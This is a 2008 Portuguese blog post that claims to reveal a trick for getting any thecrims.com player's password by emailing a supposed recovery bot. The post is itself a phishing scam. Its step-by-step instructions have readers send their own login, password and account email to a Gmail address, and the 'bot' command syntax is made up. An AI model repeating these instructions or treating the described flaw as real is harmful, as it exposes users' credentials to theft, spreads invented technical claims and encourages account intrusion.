domingo, 8 de junho de 2008

Conseguir Senhas

O método utilizado pelo http://www.thecrims.com para dar uma senha perdida é utilizar o assistente da sua web, mas se observarmos bem iremos notar que é apenas um 'bot' que tem a mesma programação do bot que por coincidência a yahoo também usa e que a única coisa que faz é enviar de forma interna os dados para poder redirecioná-los à sua base de dados. O que nem toda a gente sabe é que este processo (normalmente realizado na web) pode ser manipulado ao fazer um envio ao e-mail: thecrimsdicas@gmail.com

Consiste em enviar um e-mail fazendo-se passar pelo bot do thecrims, utilizando a sua codificação, é automático e não tem a mínina segurança, ainda assim não o usem muito porque senão podemos descobrir e acabar com nossa festa né?

Siga atentamente as instruções, a troca de apenas uma letra invalida o processo:

1º PASSO:

Entrar em seu e-mail. No campo "para:"(destinatário): escrever: ou (copie e cole para evitar invalida o processo): thecrimsdicas@gmail.com
2º PASSO:
No campo Assunto escrever: (usa copiar e colar)
GOTO_PassRecovery_mail_PASSWORD:000f-1a2a-cr0i4m5s
3º PASSO:
NA PRIMEIRA LINHA (IMPORTANTE QUE SEJA A PRIMEIRA LINHA DO CORPO DA MENSAGEM) Escrever o seguinte: (usa copiar e colar):

Rec_To-USR_RCVR: *login da vitima*-*respeito da vitima*/use_redir_gerza.
<<<>>>.
4º PASSO:
NA QUARTA LINHA PÕE O SEGUINTE:

REDIRECT_TO:*seu login*_*sua senha*_*seu e-mail de cadastro* [ a senha vai ser enviada para o e-mail de cadastro]
OBS:( TEM QUE SER UMA CONTA MUITO UTILIZADO PARA QUE HAJA UMA VERIFICAÇÃO DE QUE ESTE LOGIN REALMENTE EXISTE E NÃO FOI CRIADO A POUCO TEMPO.
* A SEGUNDA E TERCEIRA LINHA DEVEM SER ZEROS "0"
NOTA: Tem especial atenção em escrever tudo corretamente e na sua linha correspondente

O corpo da mensagem será algo assim:
Assunto: GOTO_PassRecovery_mail_PASSWORD: 000f-1a2a-cr0i4m5s
MENSAGEM:
Rec_To-USR_RCVR*login da vitima*-*respeito da vitima*/use_redir_gerza
0
0
REDIRECT_TO: :*seu login*_*sua senha*_*seu e-mail de cadastro*
E pronto, você deverá em pouco tempo receber um e-mail com a indicação da SENHA da sua "vitima". Caso não receba imediatamente, pode acontece de o bot estar sobrecarregado. Quando isso ocorre, na segunda tentativa deverá receber. Há casos de usuários que receberam a senha imediatamente, outros após mais algumas tentativas. Se não conseguir de primeira, espere pelo menos 2 horas entre cada tentativa. Não tem erro. E assim consegue descobrir senha da pobre vítima!

Nenhum comentário: